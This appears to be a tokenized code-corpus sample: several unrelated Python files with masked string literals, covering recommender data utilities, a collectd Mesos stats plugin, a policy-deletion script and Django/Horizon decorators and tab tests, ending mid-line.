HYBRID_LOG_PATH = '<STR_LIT>' <EOL> HYBRID_PREDICT_PATH = '<STR_LIT>' <EOL> HYBRID_RMSE_PATH = '<STR_LIT>' <EOL> SYNTH_ORIGINAL_PATH = '<STR_LIT>' <EOL> SYNTH_BOOT_PATH = '<STR_LIT>' <EOL> SYNTH_PREDICT_PATH = '<STR_LIT>' <EOL> SYNTH_RMSE_PATH = '<STR_LIT>' <EOL> SYNTH_LOG_PATH = '<STR_LIT>' <EOL> TRIAL_OUTPUT_PATH = '<STR_LIT>' <EOL> OUTPUT_PATH = '<STR_LIT>' <EOL> FM_GLOBAL_BIAS = '<STR_LIT:1>' <EOL> FM_ONE_WAY_INTERACTION = '<STR_LIT:1>' <EOL> LIBFM_BINARY = '<STR_LIT>' <EOL> SVDFEATURE_BUFFER_BINARY = '<STR_LIT>' <EOL> SVDFEATURE_GROUP_BUFFER_BINARY = '<STR_LIT>' <EOL> SVDFEATURE_LINE_REORDER = '<STR_LIT>' <EOL> SVDFEATURE_SVDPP_RANDORDER = '<STR_LIT>' <EOL> SVDFEATURE_BINARY = '<STR_LIT>' <EOL> SVDFEATURE_INFER_BINARY = '<STR_LIT>' <EOL> SVDFEATURE_MODEL_OUT_PATH = '<STR_LIT>' <EOL> def grabCSVColumn ( csv_path , columnNumber ) : <EOL> import csv <EOL> data = csv . reader ( open ( csv_path , '<STR_LIT>' ) , delimiter = "<STR_LIT:\t>" , quotechar = '<STR_LIT:|>' ) <EOL> ans = [ ] <EOL> for row in data : <EOL> ans . append ( row [ columnNumber ] ) <EOL> return ans <EOL> def prependTxtToFile ( inputPath , outputPath , txt ) : <EOL> with file ( inputPath , '<STR_LIT:r>' ) as original : <EOL> data = original . read ( ) <EOL> with file ( outputPath , '<STR_LIT:w>' ) as modified : <EOL> modified . write ( txt + '<STR_LIT:\n>' + data ) <EOL> def bootstrap ( inputPath , outputPath , nRows , random , replace ) : <EOL> fout = open ( outputPath , '<STR_LIT:w>' ) <EOL> rows = [ ] <EOL> fin = open ( inputPath , '<STR_LIT:r>' ) <EOL> if replace : <EOL> for line in fin : <EOL> rows . append ( line ) <EOL> for i in range ( nRows ) : <EOL> fout . write ( rows [ random . randint ( <NUM_LIT:0> , len ( rows ) - <NUM_LIT:1> ) ] ) <EOL> else : <EOL> finLines = fin . readlines ( ) <EOL> samples = random . sample ( range ( <NUM_LIT:0> , len ( finLines ) ) , nRows ) <EOL> for i in samples : <EOL> rows . append ( finLines [ i ] ) <EOL> for row in rows : <EOL> fout . write ( row ) <EOL> fout . close ( ) <EOL> def bootsplit ( inputPath , tempPath , outputPath1 , outputPath2 , split , random ) : <EOL> randomizeData ( random , inputPath , tempPath ) <EOL> splitData ( tempPath , outputPath1 , outputPath2 , split ) <EOL> def appendColumns ( infilePath1 , infilePath2 , outfilePath , outputSorted ) : <EOL> fin1 = open ( infilePath1 , '<STR_LIT:r>' ) <EOL> fin2 = open ( infilePath2 , '<STR_LIT:r>' ) <EOL> fout = open ( outfilePath , '<STR_LIT:w>' ) <EOL> userSet = set ( ) <EOL> userOrder = [ ] <EOL> linesByUser = { } <EOL> for line in fin1 : <EOL> if line != '<STR_LIT:\n>' : <EOL> columns = line . split ( '<STR_LIT:\t>' ) <EOL> user = int ( columns [ <NUM_LIT:0> ] ) <EOL> if user not in userSet : <EOL> userSet . add ( user ) <EOL> userOrder . append ( user ) <EOL> linesByUser [ user ] = [ ] <EOL> linesByUser [ user ] . append ( line ) <EOL> for line in fin2 : <EOL> if line != '<STR_LIT:\n>' : <EOL> columns = line . split ( '<STR_LIT:\t>' ) <EOL> user = int ( columns [ <NUM_LIT:0> ] ) <EOL> if user not in userSet : <EOL> userSet . add ( user ) <EOL> userOrder . append ( user ) <EOL> linesByUser [ user ] = [ ] <EOL> linesByUser [ user ] . append ( line ) <EOL> fin1 . close ( ) <EOL> fin2 . close ( ) <EOL> if outputSorted : <EOL> userOrder . sort ( ) <EOL> for user in userOrder : <EOL> for line in linesByUser . get ( user ) : <EOL> fout . write ( line ) <EOL> fout . close ( ) <EOL> def randomizeData ( random , inputPath , outputPath ) : <EOL> lines_seen = set ( ) <EOL> data = [ ] <EOL> newDataFile = open ( outputPath , '<STR_LIT:w>' ) <EOL> for line in open ( inputPath , '<STR_LIT:r>' ) : <EOL> if line != '<STR_LIT:\n>' : <EOL> if line not in lines_seen : <EOL> data . append ( ( random . random ( ) , line ) ) <EOL> lines_seen . add ( line ) <EOL> data . sort ( ) <EOL> newDataFile = open ( outputPath , '<STR_LIT:w>' ) <EOL> for _ , line in data : <EOL> newDataFile . write ( line ) <EOL> newDataFile . close ( ) <EOL> def aggregatePredictions ( masterPath , foutPath , actualPred , predictionPathList ) : <EOL> master = open ( masterPath , '<STR_LIT:r>' ) <EOL> fout = open ( foutPath , '<STR_LIT:w>' ) <EOL> userDict = { } <EOL> for path in predictionPathList : <EOL> fin = open ( path , '<STR_LIT:r>' ) <EOL> for line in fin : <EOL> if line != '<STR_LIT:\n>' : <EOL> line = line . replace ( '<STR_LIT:\n>' , '<STR_LIT>' ) <EOL> columns = line . split ( '<STR_LIT:\t>' ) <EOL> user = columns [ <NUM_LIT:0> ] <EOL> movie = columns [ <NUM_LIT:1> ] <EOL> rating = columns [ <NUM_LIT:2> ] <EOL> if user not in userDict : <EOL> userDict [ user ] = { } <EOL> if movie not in userDict [ user ] : <EOL> userDict [ user ] [ movie ] = [ ] <EOL> userDict [ user ] [ movie ] . append ( rating ) <EOL> for line in master : <EOL> if line != '<STR_LIT:\n>' : <EOL> line = line . replace ( '<STR_LIT:\n>' , '<STR_LIT>' ) <EOL> columns = line . split ( '<STR_LIT:\t>' ) <EOL> user = columns [ <NUM_LIT:0> ] <EOL> movie = columns [ <NUM_LIT:1> ] <EOL> if actualPred : <EOL> rating = columns [ <NUM_LIT:2> ] <EOL> if user in userDict : <EOL> if movie in userDict [ user ] : <EOL> string = '<STR_LIT>' <EOL> for pred in userDict [ user ] [ movie ] : <EOL> string = string + pred + '<STR_LIT:\t>' <EOL> string = string [ : - <NUM_LIT:1> ] <EOL> fout . write ( line + '<STR_LIT:\t>' + string + '<STR_LIT:\n>' ) <EOL> else : <EOL> fout . write ( line + '<STR_LIT:\n>' ) <EOL> def splitData ( inputPath , outputPath1 , outputPath2 , split ) : <EOL> counter = <NUM_LIT:0> <EOL> data = open ( inputPath , '<STR_LIT:r>' ) <EOL> outfile1 = open ( outputPath1 , '<STR_LIT:w>' ) <EOL> outfile2 = open ( outputPath2 , '<STR_LIT:w>' ) <EOL> dataLines = data . readlines ( ) <EOL> lineCount = len ( dataLines ) <EOL> for line in dataLines : <EOL> if counter < int ( lineCount * split ) : <EOL> outfile1 . write ( line ) <EOL> counter += <NUM_LIT:1> <EOL> else : <EOL> outfile2 . write ( line ) <EOL> data . close ( ) <EOL> outfile1 . close ( ) <EOL> outfile2 . close ( ) </s>
<s> import unittest <EOL> import JustReleaseNotes . artifacters <EOL> from JustReleaseNotes . artifacters import factory <EOL> class factory_Test ( unittest . TestCase ) : <EOL> def test_factoryRetrievesArtifactory ( self ) : <EOL> self . assertIsNotNone ( JustReleaseNotes . artifacters . factory . create ( <EOL> { <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : { <EOL> "<STR_LIT>" : { <EOL> "<STR_LIT:type>" : "<STR_LIT>" <EOL> } <EOL> } } ) ) <EOL> def test_factoryRetrievesGitHubReleases ( self ) : <EOL> self . assertIsNotNone ( JustReleaseNotes . artifacters . factory . create ( <EOL> { <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" <EOL> } ) ) <EOL> def test_failsIfArtifacterUnknown ( self ) : <EOL> with self . assertRaises ( Exception ) : <EOL> JustReleaseNotes . artifacters . factory . create ( { "<STR_LIT>" : "<STR_LIT>" } ) </s>
<s> import collectd <EOL> import json <EOL> import urllib2 <EOL> import socket <EOL> import collections <EOL> PREFIX = "<STR_LIT>" <EOL> MESOS_INSTANCE = "<STR_LIT>" <EOL> MESOS_HOST = "<STR_LIT:localhost>" <EOL> MESOS_PORT = <NUM_LIT> <EOL> MESOS_VERSION = "<STR_LIT>" <EOL> MESOS_URL = "<STR_LIT>" <EOL> VERBOSE_LOGGING = False <EOL> CONFIGS = [ ] <EOL> Stat = collections . namedtuple ( '<STR_LIT>' , ( '<STR_LIT:type>' , '<STR_LIT:path>' ) ) <EOL> STATS_MESOS = { <EOL> '<STR_LIT>' : Stat ( "<STR_LIT>" , "<STR_LIT>" ) , <EOL> '<STR_LIT>' : Stat ( "<STR_LIT>" , "<STR_LIT>" ) , <EOL> '<STR_LIT>' : Stat ( "<STR_LIT>" , "<STR_LIT>" ) , <EOL> '<STR_LIT>' : Stat ( "<STR_LIT>" , "<STR_LIT>" ) , <EOL> '<STR_LIT>' : Stat ( "<STR_LIT>" , "<STR_LIT>" ) , <EOL> '<STR_LIT>' : Stat ( "<STR_LIT>" , "<STR_LIT>" ) , <EOL> '<STR_LIT>' : Stat ( "<STR_LIT>" , "<STR_LIT>" ) , <EOL> '<STR_LIT>' : Stat ( "<STR_LIT>" , "<STR_LIT>" ) , <EOL> '<STR_LIT>' : Stat ( "<STR_LIT>" , "<STR_LIT>" ) , <EOL> '<STR_LIT>' : Stat ( "<STR_LIT>" , "<STR_LIT>" ) , <EOL> '<STR_LIT>' : Stat ( "<STR_LIT>" , "<STR_LIT>" ) , <EOL> '<STR_LIT>' : Stat ( "<STR_LIT>" , "<STR_LIT>" ) , <EOL> '<STR_LIT>' : Stat ( "<STR_LIT>" , "<STR_LIT>" ) , <EOL> '<STR_LIT>' : Stat ( "<STR_LIT>" , "<STR_LIT>" ) , <EOL> '<STR_LIT>' : Stat ( "<STR_LIT>" , "<STR_LIT>" ) , <EOL> '<STR_LIT>' : Stat ( "<STR_LIT>" , "<STR_LIT>" ) , <EOL> '<STR_LIT>' : Stat ( "<STR_LIT>" , "<STR_LIT>" ) , <EOL> '<STR_LIT>' : Stat ( "<STR_LIT>" , "<STR_LIT>" ) , <EOL> '<STR_LIT>' : Stat ( "<STR_LIT>" , "<STR_LIT>" ) , <EOL> '<STR_LIT>' : Stat ( "<STR_LIT>" , "<STR_LIT>" ) , <EOL> '<STR_LIT>' : Stat ( "<STR_LIT>" , "<STR_LIT>" ) <EOL> } <EOL> STATS_MESOS_019 = { <EOL> } <EOL> STATS_MESOS_020 = { <EOL> '<STR_LIT>' : Stat ( "<STR_LIT>" , "<STR_LIT>" ) , <EOL> '<STR_LIT>' : Stat ( "<STR_LIT>" , "<STR_LIT>" ) , <EOL> '<STR_LIT>' : Stat ( "<STR_LIT>" , "<STR_LIT>" ) , <EOL> '<STR_LIT>' : Stat ( "<STR_LIT>" , "<STR_LIT>" ) <EOL> } <EOL> STATS_MESOS_021 = { <EOL> '<STR_LIT>' : Stat ( "<STR_LIT>" , "<STR_LIT>" ) , <EOL> '<STR_LIT>' : Stat ( "<STR_LIT>" , "<STR_LIT>" ) , <EOL> '<STR_LIT>' : Stat ( "<STR_LIT>" , "<STR_LIT>" ) , <EOL> '<STR_LIT>' : Stat ( "<STR_LIT>" , "<STR_LIT>" ) , <EOL> '<STR_LIT>' : Stat ( "<STR_LIT>" , "<STR_LIT>" ) , <EOL> '<STR_LIT>' : Stat ( "<STR_LIT>" , "<STR_LIT>" ) , <EOL> '<STR_LIT>' : Stat ( "<STR_LIT>" , "<STR_LIT>" ) , <EOL> '<STR_LIT>' : Stat ( "<STR_LIT>" , "<STR_LIT>" ) , <EOL> '<STR_LIT>' : Stat ( "<STR_LIT>" , "<STR_LIT>" ) , <EOL> '<STR_LIT>' : Stat ( "<STR_LIT>" , "<STR_LIT>" ) , <EOL> '<STR_LIT>' : Stat ( "<STR_LIT>" , "<STR_LIT>" ) , <EOL> '<STR_LIT>' : Stat ( "<STR_LIT>" , "<STR_LIT>" ) , <EOL> '<STR_LIT>' : Stat ( "<STR_LIT>" , "<STR_LIT>" ) <EOL> } <EOL> STATS_MESOS_022 = STATS_MESOS_021 . copy ( ) <EOL> def get_stats_string ( version ) : <EOL> if version == "<STR_LIT>" or version == "<STR_LIT>" : <EOL> stats_cur = dict ( STATS_MESOS . items ( ) + STATS_MESOS_019 . items ( ) ) <EOL> elif version == "<STR_LIT>" or version == "<STR_LIT>" : <EOL> stats_cur = dict ( STATS_MESOS . items ( ) + STATS_MESOS_020 . items ( ) ) <EOL> elif version == "<STR_LIT>" or version == "<STR_LIT>" : <EOL> stats_cur = dict ( STATS_MESOS . items ( ) + STATS_MESOS_021 . items ( ) ) <EOL> elif version == "<STR_LIT>" or version == "<STR_LIT>" : <EOL> stats_cur = dict ( STATS_MESOS . items ( ) + STATS_MESOS_022 . items ( ) ) <EOL> else : <EOL> stats_cur = dict ( STATS_MESOS . items ( ) + STATS_MESOS_022 . items ( ) ) <EOL> return stats_cur <EOL> def lookup_stat ( stat , json , conf ) : <EOL> val = dig_it_up ( json , get_stats_string ( conf [ '<STR_LIT:version>' ] ) [ stat ] . path ) <EOL> if not isinstance ( val , bool ) : <EOL> return val <EOL> else : <EOL> return None <EOL> def configure_callback ( conf ) : <EOL> """<STR_LIT>""" <EOL> host = MESOS_HOST <EOL> port = MESOS_PORT <EOL> verboseLogging = VERBOSE_LOGGING <EOL> version = MESOS_VERSION <EOL> instance = MESOS_INSTANCE <EOL> for node in conf . children : <EOL> if node . key == '<STR_LIT>' : <EOL> host = node . values [ <NUM_LIT:0> ] <EOL> elif node . key == '<STR_LIT>' : <EOL> port = int ( node . values [ <NUM_LIT:0> ] ) <EOL> elif node . key == '<STR_LIT>' : <EOL> verboseLogging = bool ( node . values [ <NUM_LIT:0> ] ) <EOL> elif node . key == '<STR_LIT>' : <EOL> version = node . values [ <NUM_LIT:0> ] <EOL> elif node . key == '<STR_LIT>' : <EOL> instance = node . values [ <NUM_LIT:0> ] <EOL> else : <EOL> collectd . warning ( '<STR_LIT>' % node . key ) <EOL> continue <EOL> log_verbose ( '<STR_LIT:true>' , '<STR_LIT>' % ( host , port , verboseLogging , version , instance ) ) <EOL> CONFIGS . append ( { <EOL> '<STR_LIT:host>' : host , <EOL> '<STR_LIT:port>' : port , <EOL> '<STR_LIT>' : "<STR_LIT>" + host + "<STR_LIT::>" + str ( port ) + "<STR_LIT>" , <EOL> '<STR_LIT>' : verboseLogging , <EOL> '<STR_LIT:version>' : version , <EOL> '<STR_LIT>' : instance , <EOL> } ) <EOL> def fetch_stats ( ) : <EOL> for conf in CONFIGS : <EOL> try : <EOL> result = json . load ( urllib2 . urlopen ( conf [ '<STR_LIT>' ] , timeout = <NUM_LIT:10> ) ) <EOL> except urllib2 . URLError , e : <EOL> collectd . error ( '<STR_LIT>' % ( conf [ '<STR_LIT>' ] , e ) ) <EOL> return None <EOL> parse_stats ( conf , result ) <EOL> def parse_stats ( conf , json ) : <EOL> """<STR_LIT>""" <EOL> for name , key in get_stats_string ( conf [ '<STR_LIT:version>' ] ) . iteritems ( ) : <EOL> result = lookup_stat ( name , json , conf ) <EOL> dispatch_stat ( result , name , key , conf ) <EOL> def dispatch_stat ( result , name , key , conf ) : <EOL> """<STR_LIT>""" <EOL> if result is None : <EOL> collectd . warning ( '<STR_LIT>' % name ) <EOL> return <EOL> estype = key . type <EOL> value = result <EOL> log_verbose ( conf [ '<STR_LIT>' ] , '<STR_LIT>' % ( estype , name , value , conf [ '<STR_LIT>' ] ) ) <EOL> val = collectd . Values ( plugin = '<STR_LIT>' ) <EOL> val . type = estype <EOL> val . type_instance = name <EOL> val . values = [ value ] <EOL> val . plugin_instance = conf [ '<STR_LIT>' ] <EOL> val . meta = { '<STR_LIT:0>' : True } <EOL> val . dispatch ( ) <EOL> def read_callback ( ) : <EOL> log_verbose ( '<STR_LIT:true>' , '<STR_LIT>' ) <EOL> stats = fetch_stats ( ) <EOL> def dig_it_up ( obj , path ) : <EOL> try : <EOL> if type ( path ) in ( str , unicode ) : <EOL> path = path . split ( '<STR_LIT:.>' ) <EOL> return reduce ( lambda x , y : x [ y ] , path , obj ) <EOL> except : <EOL> return False <EOL> def log_verbose ( enabled , msg ) : <EOL> if not enabled : <EOL> return <EOL> collectd . info ( '<STR_LIT>' % msg ) <EOL> collectd . register_config ( configure_callback ) <EOL> collectd . register_read ( read_callback ) </s>
<s> import requests <EOL> controller_url = "<STR_LIT>" <EOL> delete_policy_url = controller_url + '<STR_LIT>' <EOL> policy_delete_response = requests . delete ( delete_policy_url , verify = False ) <EOL> print ( "<STR_LIT>" + policy_delete_response . text ) <EOL> task_url = controller_url + policy_delete_response . json ( ) [ '<STR_LIT>' ] [ '<STR_LIT:url>' ] <EOL> task_response = requests . get ( task_url , verify = False ) <EOL> print ( "<STR_LIT>" + task_response . json ( ) [ "<STR_LIT>" ] [ "<STR_LIT>" ] ) </s>
<s> import logging <EOL> logging . basicConfig ( filename = '<STR_LIT>' , level = logging . DEBUG ) <EOL> logging . debug ( '<STR_LIT>' ) <EOL> logging . info ( '<STR_LIT>' ) <EOL> logging . warning ( '<STR_LIT>' ) </s>
<s> """<STR_LIT>""" <EOL> import os <EOL> import lxml . etree as ET <EOL> from django . conf import settings <EOL> class Response ( object ) : <EOL> """<STR_LIT>""" <EOL> @ staticmethod <EOL> def _build ( _type , tag , msg , xml ) : <EOL> """<STR_LIT>""" <EOL> response = ET . Element ( '<STR_LIT>' ) <EOL> if _type : <EOL> response . set ( '<STR_LIT:type>' , _type ) <EOL> msgtag = ET . Element ( tag ) <EOL> if msg : <EOL> msgtag . text = msg <EOL> response . append ( msgtag ) <EOL> if xml is not None : <EOL> response . append ( xml ) <EOL> return ET . tostring ( response ) <EOL> @ staticmethod <EOL> def error ( _type , msg , xml = None ) : <EOL> """<STR_LIT>""" <EOL> return Response . _build ( _type , '<STR_LIT:error>' , msg , xml ) <EOL> @ staticmethod <EOL> def success ( _type , msg , xml = None ) : <EOL> """<STR_LIT>""" <EOL> return Response . _build ( _type , '<STR_LIT:success>' , msg , xml ) <EOL> class ServerSettings ( object ) : <EOL> @ staticmethod <EOL> def user_aware ( ) : <EOL> return True <EOL> @ staticmethod <EOL> def session_path ( session ) : <EOL> """<STR_LIT>""" <EOL> return os . path . join ( '<STR_LIT:data>' , '<STR_LIT>' , session ) <EOL> @ staticmethod <EOL> def yang_path ( user ) : <EOL> """<STR_LIT>""" <EOL> return os . path . join ( '<STR_LIT:data>' , '<STR_LIT>' , user , '<STR_LIT>' ) <EOL> @ staticmethod <EOL> def cxml_path ( user ) : <EOL> """<STR_LIT>""" <EOL> return os . path . join ( '<STR_LIT:data>' , '<STR_LIT>' , user , '<STR_LIT>' ) <EOL> @ staticmethod <EOL> def schema_path ( session ) : <EOL> """<STR_LIT>""" <EOL> return os . path . join ( settings . BASE_DIR , '<STR_LIT:data>' , '<STR_LIT>' , session ) </s>
<s> """<STR_LIT>""" <EOL> import functools <EOL> from django . utils . decorators import available_attrs <EOL> from django . utils . translation import ugettext_lazy as _ <EOL> def _current_component ( view_func , dashboard = None , panel = None ) : <EOL> """<STR_LIT>""" <EOL> @ functools . wraps ( view_func , assigned = available_attrs ( view_func ) ) <EOL> def dec ( request , * args , ** kwargs ) : <EOL> if dashboard : <EOL> request . horizon [ '<STR_LIT>' ] = dashboard <EOL> if panel : <EOL> request . horizon [ '<STR_LIT>' ] = panel <EOL> return view_func ( request , * args , ** kwargs ) <EOL> return dec <EOL> def require_auth ( view_func ) : <EOL> """<STR_LIT>""" <EOL> from horizon . exceptions import NotAuthenticated <EOL> @ functools . wraps ( view_func , assigned = available_attrs ( view_func ) ) <EOL> def dec ( request , * args , ** kwargs ) : <EOL> if request . user . is_authenticated ( ) : <EOL> return view_func ( request , * args , ** kwargs ) <EOL> raise NotAuthenticated ( _ ( "<STR_LIT>" ) ) <EOL> return dec <EOL> def require_perms ( view_func , required ) : <EOL> """<STR_LIT>""" <EOL> from horizon . exceptions import NotAuthorized <EOL> current_perms = getattr ( view_func , '<STR_LIT>' , set ( [ ] ) ) <EOL> view_func . _required_perms = current_perms | set ( required ) <EOL> @ functools . wraps ( view_func , assigned = available_attrs ( view_func ) ) <EOL> def dec ( request , * args , ** kwargs ) : <EOL> if request . user . is_authenticated ( ) : <EOL> if request . user . has_perms ( view_func . _required_perms ) : <EOL> return view_func ( request , * args , ** kwargs ) <EOL> raise NotAuthorized ( _ ( "<STR_LIT>" ) <EOL> % request . path ) <EOL> if required : <EOL> return dec <EOL> else : <EOL> return view_func </s>
<s> import horizon <EOL> from horizon import base <EOL> try : <EOL> cats = horizon . get_dashboard ( "<STR_LIT>" ) <EOL> cats . name = "<STR_LIT>" <EOL> except base . NotRegistered : <EOL> cats = None <EOL> if cats : <EOL> try : <EOL> tigers = cats . get_panel ( "<STR_LIT>" ) <EOL> cats . unregister ( tigers . __class__ ) <EOL> except base . NotRegistered : <EOL> pass <EOL> try : <EOL> dogs = horizon . get_dashboard ( "<STR_LIT>" ) <EOL> horizon . unregister ( dogs . __class__ ) <EOL> except base . NotRegistered : <EOL> pass </s>
<s> import copy <EOL> from django import http <EOL> from horizon import exceptions <EOL> from horizon import tabs as horizon_tabs <EOL> from horizon . test import helpers as test <EOL> from horizon . test . tests . tables import MyTable <EOL> from horizon . test . tests . tables import TEST_DATA <EOL> class BaseTestTab ( horizon_tabs . Tab ) : <EOL> def get_context_data ( self , request ) : <EOL> return { "<STR_LIT>" : self } <EOL> class TabOne ( BaseTestTab ) : <EOL> slug = "<STR_LIT>" <EOL> name = "<STR_LIT>" <EOL> template_name = "<STR_LIT>" <EOL> class TabDelayed ( BaseTestTab ) : <EOL> slug = "<STR_LIT>" <EOL> name = "<STR_LIT>" <EOL> template_name = "<STR_LIT>" <EOL> preload = False <EOL> class TabDisabled ( BaseTestTab ) : <EOL> slug = "<STR_LIT>" <EOL> name = "<STR_LIT>" <EOL> template_name = "<STR_LIT>" <EOL> def enabled ( self , request ) : <EOL> return False <EOL> class TabDisallowed ( BaseTestTab ) : <EOL> slug = "<STR_LIT>" <EOL> name = "<STR_LIT>" <EOL> template_name = "<STR_LIT>" <EOL> def allowed ( self , request ) : <EOL> return False <EOL> class Group ( horizon_tabs . TabGroup ) : <EOL> slug = "<STR_LIT>" <EOL> tabs = ( TabOne , TabDelayed , TabDisabled , TabDisallowed ) <EOL> sticky = True <EOL> def tabs_not_available ( self ) : <EOL> self . _assert_tabs_not_available = True <EOL> class TabWithTable ( horizon_tabs . TableTab ) : <EOL> table_classes = ( MyTable , ) <EOL> name = "<STR_LIT>" <EOL> slug = "<STR_LIT>" <EOL> template_name = "<STR_LIT>" <EOL> def get_my_table_data ( self ) : <EOL> return TEST_DATA <EOL> class RecoverableErrorTab ( horizon_tabs . Tab ) : <EOL> name = "<STR_LIT>" <EOL> slug = "<STR_LIT>" <EOL> template_name = "<STR_LIT>" <EOL> def get_context_data ( self , request ) : <EOL> exc = exceptions . AlreadyExists ( "<STR_LIT>" , horizon_tabs . Tab ) <EOL> exc . silence_logging = True <EOL> raise exc <EOL> class TableTabGroup ( horizon_tabs . TabGroup ) : <EOL> slug = "<STR_LIT>" <EOL> tabs = [ TabWithTable ] <EOL> class TabWithTableView ( horizon_tabs . TabbedTableView ) : <EOL> tab_group_class = TableTabGroup <EOL> template_name = "<STR_LIT>" <EOL> class TabTests ( test . TestCase ) : <EOL> def test_tab_group_basics ( self ) : <EOL> tg = Group ( self . request ) <EOL> tabs = tg . get_tabs ( ) <EOL> self . assertQuerysetEqual ( tabs , [ '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' ] ) <EOL> self . assertEqual ( "<STR_LIT>" , tg . get_id ( ) ) <EOL> self . assertEqual ( horizon_tabs . base . CSS_TAB_GROUP_CLASSES , <EOL> tg . get_default_classes ( ) ) <EOL> self . assertEqual ( "<STR_LIT>" , tg . get_tab ( "<STR_LIT>" ) . slug ) <EOL> self . assertIsNone ( tg . selected ) <EOL> self . assertIsNone ( tg . get_selected_tab ( ) ) <EOL> def test_tab_group_active_tab ( self ) : <EOL> tg = Group ( self . request ) <EOL> self . assertEqual ( tg . get_tabs ( ) [ <NUM_LIT:0> ] , tg . active ) <EOL> self . request . GET [ '<STR_LIT>' ] = "<STR_LIT>" <EOL> tg = Group ( self . request ) <EOL> self . assertEqual ( tg . get_tab ( '<STR_LIT>' ) , tg . active ) <EOL> self . request . GET [ '<STR_LIT>' ] = "<STR_LIT>" <EOL> tg = Group ( self . request ) <EOL> self . assertEqual ( tg . get_tabs ( ) [ <NUM_LIT:0> ] , tg . active ) <EOL> self . request . GET [ '<STR_LIT>' ] = "<STR_LIT>" <EOL> tg = Group ( self . request ) <EOL> self . assertEqual ( tg . get_tabs ( ) [ <NUM_LIT:0> ] , tg . active ) <EOL> self . request . GET [ '<STR_LIT>' ] = "<STR_LIT>" <EOL> tg = Group ( self . request ) <EOL> self . assertEqual ( tg . get_tabs ( ) [ <NUM_LIT:0> ] , tg . active ) <EOL> self . request . GET [ '<STR_LIT>' ] = "<STR_LIT>" <EOL> tg = Group ( self . request ) <EOL> self . assertEqual ( tg . get_tabs ( ) [ <NUM_LIT:0> ] , tg . active ) <EOL> def test_tab_basics ( self ) : <EOL> tg = Group ( self . request ) <EOL> tab_one = tg . get_tab ( "<STR_LIT>" ) <EOL> tab_delayed = tg . get_tab ( "<STR_LIT>" ) <EOL> tab_disabled = tg . get_tab ( "<STR_LIT>" , allow_disabled = True ) <EOL> tab_disallowed = tg . get_tab ( "<STR_LIT>" ) <EOL> self . assertIsNone ( tab_disallowed ) <EOL> self . assertEqual ( "<STR_LIT>" , tab_one . get_id ( ) ) <EOL> self . assertEqual ( horizon_tabs . base . CSS_ACTIVE_TAB_CLASSES , <EOL> tab_one . get_default_classes ( ) ) <EOL> self . assertEqual ( horizon_tabs . base . CSS_DISABLED_TAB_CLASSES , <EOL> tab_disabled . get_default_classes ( ) ) <EOL> self . assertTrue ( tab_one . load ) <EOL> self . assertFalse ( tab_delayed . load ) <EOL> self . assertFalse ( tab_disabled . load ) <EOL> self . request . GET [ '<STR_LIT>' ] = tab_delayed . get_id ( ) <EOL> tg = Group ( self . request ) <EOL> tab_delayed = tg . get_tab ( "<STR_LIT>" ) <EOL> self . assertTrue ( tab_delayed . load ) <EOL> self . request . GET [ '<STR_LIT>' ] = "<STR_LIT>" <EOL> tg = Group ( self . request ) <EOL> tab_one = tg . get_tab ( "<STR_LIT>" ) <EOL> tab_delayed = tg . get_tab ( "<STR_LIT>" ) <EOL> self . assertTrue ( tab_one . is_active ( ) ) <EOL> self . assertFalse ( tab_delayed . is_active ( ) ) <EOL> self . request . GET [ '<STR_LIT>' ] = tab_delayed . get_id ( ) <EOL> tg = Group ( self . request ) <EOL> tab_one = tg . get_tab ( "<STR_LIT>" ) <EOL> tab_delayed = tg . get_tab ( "<STR_LIT>" ) <EOL> self . assertFalse ( tab_one . is_active ( ) ) <EOL> self . assertTrue ( tab_delayed . is_active ( ) ) <EOL> def test_rendering ( self ) : <EOL> tg = Group ( self . request ) <EOL> tab_one = tg . get_tab ( "<STR_LIT>" ) <EOL> tab_delayed = tg . get_tab ( "<STR_LIT>" ) <EOL> tab_disabled = tg . get_tab ( "<STR_LIT>" , allow_disabled = True ) <EOL> output = tg . render ( ) <EOL> res = http . HttpResponse ( output . strip ( ) ) <EOL> self . assertContains ( res , "<STR_LIT>" , <NUM_LIT:3> ) <EOL> self . assertContains ( res , '<STR_LIT>' , <NUM_LIT:1> ) <EOL> output = tab_one . render ( ) <EOL> self . assertEqual ( tab_one . name , output . strip ( ) ) <EOL> output = tab_disabled . render ( ) <EOL> self . assertEqual ( "<STR_LIT>" , output . strip ( ) ) <EOL> output = tab_delayed . render ( ) <EOL> self . assertEqual ( "<STR_LIT>" , output . strip ( ) ) <EOL> self . request . GET [ '<STR_LIT>' ] = tab_delayed . get_id ( ) <EOL> tg = Group ( self . request ) <EOL> tab_delayed = tg . get_tab ( "<STR_LIT>" ) <EOL> output = tab_delayed . render ( ) <EOL> self . assertEqual ( tab_delayed . name , output . strip ( ) ) <EOL> def test_table_tabs ( self ) : <EOL> tab_group = TableTabGroup ( self . request ) <EOL> tabs = tab_group . get_tabs ( ) <EOL> self . assertEqual ( <NUM_LIT:1> , len ( tabs ) ) <EOL> tab = tabs [ <NUM_LIT:0> ] <EOL> self . assertIsInstance ( tab , horizon_tabs . TableTab ) <EOL> self . assertFalse ( tab . _table_data_loaded ) <EOL> table = tab . _tables [ MyTable . Meta . name ] <EOL> self . assertIsInstance ( table , MyTable ) <EOL> self . assertIsNone ( table . data ) <EOL> tab . load_table_data ( ) <EOL> self . assertTrue ( tab . _table_data_loaded ) <EOL> self . assertQuerysetEqual ( table . data , [ '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' ] ) <EOL> context = tab . get_context_data ( self . request ) <EOL> self . assertEqual ( table , context [ '<STR_LIT>' ] ) <EOL> self . assertEqual ( table , context [ '<STR_LIT>' ] ) <EOL> def test_tabbed_table_view ( self ) : <EOL> view = TabWithTableView . as_view ( ) <EOL> req = self . factory . get ( "<STR_LIT:/>" ) <EOL> res = view ( req ) <EOL> self . assertContains ( res , "<STR_LIT>" , <NUM_LIT:1> ) <EOL> self . assertContains ( res , "<STR_LIT>" , <NUM_LIT:1> ) <EOL> params = { "<STR_LIT>" : "<STR_LIT>" , "<STR_LIT:action>" : "<STR_LIT>" , "<STR_LIT>" : "<STR_LIT:1>" } <EOL> req 